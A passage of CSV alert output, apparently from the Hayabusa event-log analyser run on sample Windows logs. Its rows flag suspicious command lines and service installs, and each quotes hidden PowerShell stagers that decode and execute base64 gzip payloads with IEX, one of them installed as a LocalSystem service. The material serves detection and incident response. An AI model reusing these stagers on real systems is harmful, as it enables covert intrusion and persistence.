iH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSk